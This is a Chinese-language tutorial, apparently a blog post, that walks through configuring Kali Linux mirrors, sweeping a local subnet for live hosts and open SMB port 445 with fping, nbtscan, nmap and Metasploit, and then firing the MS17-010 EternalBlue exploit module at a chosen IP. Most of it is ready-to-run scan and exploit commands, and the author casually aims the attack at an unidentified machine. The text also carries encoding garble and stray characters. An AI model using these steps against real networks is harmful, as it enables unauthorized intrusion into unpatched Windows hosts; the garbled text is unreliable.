- 編輯kali的源為國內(nèi)源
1.#阿里云Kali源
2.deb http://mirrors.aliyun.com/kali kali main non-free contrib
3.deb-src http://mirrors.aliyun.com/kali kali main non-free contrib
4.deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free
- 更新應(yīng)用
apt-get update && apt-get upgrade && apt-get dist-upgrade
- 更新系統(tǒng)內(nèi)核
apt-get install linux-headers-$(uname -r)
- 如果報錯可以試試這個
aptitude -r install linux-headers-$(uname -r
- 主機存活檢測
# fping 工具 kali自帶
fping -asg 192.168.1.0/24
1.jpg
# nbtscan工具 kali自帶
nbtscan -r 192.168.1.0/24
2.jpg
# nmap ping 包掃描
nmap -n -sS 192.168.1.0/24
# 指定端口發(fā)現(xiàn)掃描
nmap -n -p445 192.168.1.0/24 --open
# 針對漏洞腳本的定向掃描
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open
# 個人推薦使用 nmap -n -p445 192.168.1.0/24 --open 其掃描發(fā)現(xiàn)的效率最高。
3.jpg
- MSF Auxiliary 輔助掃描
msfconsole # 進入MSF框架
version # 確認(rèn)下MSF的版本
search ms17_010 # 查找漏洞模塊的具體路徑
use auxiliary/scanner/smb/smb_ms17_010 # 調(diào)用漏洞掃描模塊
show options # 查看模塊配置選項
set RHOST 192.168.1.1-254 # 配置掃描目標(biāo)
set THREADS 30 #配置掃描線程
run #運行腳本
- 這個使用下來饭聚,我們發(fā)現(xiàn)其實還沒有namp 一條命令就搞定了仆百,來的方便慌闭。
- 上邊的都是為了掃描開放端口的主機初坠,接下來利用漏洞獲取權(quán)限
ms17-010 漏洞利用之MSF使用方法
msfconsole # 進入MSF 框架
version # 確保MSF框架版本在 4.14.17以上箕别;
search ms17_010 # 漏洞模塊路徑查詢
use exploit/windows/smb/ms17_010_eternalblue # 調(diào)用攻擊模塊
set RHOST 192.168.1.112 # 設(shè)定攻擊目標(biāo)
exploit # 發(fā)起攻擊
-
查找漏洞模塊路徑
4.jpg -
調(diào)用和配置exploit攻擊參數(shù)
5.jpg -
設(shè)置工具目標(biāo)
6.jpg -
發(fā)起攻擊 exploit 或者 run
7.jpg - 我手動終止了铜幽,不知道這是什么機器,不亂搞了串稀,如果成功會直接返回會話(看各位的運氣了除抛!)